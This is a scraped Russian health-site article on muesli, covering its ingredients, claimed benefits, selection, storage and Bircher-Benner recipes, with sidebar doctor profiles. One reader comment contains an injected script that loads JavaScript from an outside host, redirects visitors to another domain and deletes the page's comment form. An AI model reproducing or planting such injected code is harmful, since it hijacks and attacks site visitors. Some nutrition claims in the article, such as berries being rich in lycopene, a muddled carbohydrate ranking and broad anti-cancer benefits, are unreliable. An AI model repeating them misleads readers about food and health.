Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Полезный микс. Мюсли  >>  Полезный микс. Мюсли
 
Обратная связь
 

Полезный микс. Мюсли

Размер шрифта
17 января 2012 10:29
  • google_analytics: false
  • Нравится

Какие ингредиенты должны содержать традиционные мюсли? Готовим Бихер-мюсли по оригинальному рецепту.

Мюсли – еда, приготовленная из сырых или запеченных злаков, фруктов или сухофруктов, орехов, отрубей, ростков пшеницы и специй.

Мюсли были изобретены швейцарским врачом Бирхером-Беннером для пациентов госпиталя, где фрукты и овощи являлись необходимой частью здорового рациона.

Традиционный состав мюсли:

  • овсяные хлопья
  • цельные злаки (зерна пшеницы, риса, ячменя, ржи)
  • свежие фрукты или сухофрукты
  • орехи и семена
  • специи (особенно корица).

Чем полезны мюсли?

  1. Овсяные хлопья

  • Содержит нерастворимые волокна, которые улучшают перистальтику кишечника, предотвращают запоры, регулируют уровень холестерина в крови, контролируют уровень сахара в крови, тем самым предотвращая всплеск инсулина.
  • Содержат фитовещества – лигнаны, которые помогают снижать риск заболевания раком груди, раком яичников, раком простаты.
  • Источник витамина B1: сопровождает процессы высвобождения энергии.
  • Хлопья богаты магнием, который участвует в процессе производства белка и высвобождает энергию из мышц.
  1. Свежие фрукты

  • Яблоки и апельсины – источник витамина С, который помогает усваиваться железу. А железо необходимо для переноски кислорода по крови по всему организму. Также витамин С воздействует на выработку коллагена, необходимый для эластичности кожи и сосудов.
  1. Ягоды

  • Содержат витамины группы B, которые укрепляю наш иммунитет, улучшают память, состояние волос и ногтей.
  • Богаты ликопином, мощным антиоксидантом, предотвращающим рак простаты.
  1. Орехи

Грецкие орехи содержат:

  • Омега-3 жирные кислоты, которые полезны для мозга, улучшают работу нервных клеток, участвуют в миелинизации нервных клеток, тем самым улучшают нашу нервную систему.
  • Омега-3 полезны для сосудов и сердца, так как уменьшают уровень холестерина, расслабляют сосуды и контролируют баланс сахара в крови. Благодаря этому снижается риск заболевания атеросклерозом, инсультом и инфарктом.

Пьедестал почета по минимальному количеству углеводов:

1. Геркулесовая каша на молоке – 14 г.

2. Мюсли – 70 г.

3. Кукурузные хлопья – 80-90 г.

Суточная доза – от 30 до 50 г мюсли (около 150 ккал), залитых стаканом воды или сока.

Как выбрать

  • Сухие мюсли не должны быть ни влажными, ни прогорклыми.
  • Традиционные мюсли – без добавления сахара, соли, дополнительной термической обработки.
  • Лучше выбирать традиционные необжаренные мюсли.
  • Мюсли в шоколаде, меде слишком калорийны. От них лучше отказаться. 

Как хранить

Хранить в герметичном контейнере в темном сухом месте.

Как готовить

Первый рецепт мюсли от швейцарского врача был такой:

1. Полстоловой ложки овсяных хлопьев и полстоловой ложки зерен пшеницы, риса, ячменя, ржи или пшенки смешать, добавить ложку лимонного сока, залить соком или водой.
2. Перемешать до однородной массы, а перед подачей на стол порезать одно яблоко и добавить ложку измельченного миндаля или грецкого ореха.

Рецепт свежих Бирхер-мюсли:

1. Мелко порезать кубиками фрукты и сбрызнуть их соком лимона, чтобы не потемнели.
2. Всыпать в порезанные фрукты смесь мюсли и перемешать.
3. Выжать сок 1 апельсина и добавить в мюсли.
4. Добавить немного корицы и нежирного йогурта.


Сюжеты по теме:
Мюсли. Сухие завтраки

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

5 лучших и 5 худших перекусов Еда, которая заставляет вас ЕСТЬ
Суперзавтраки    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.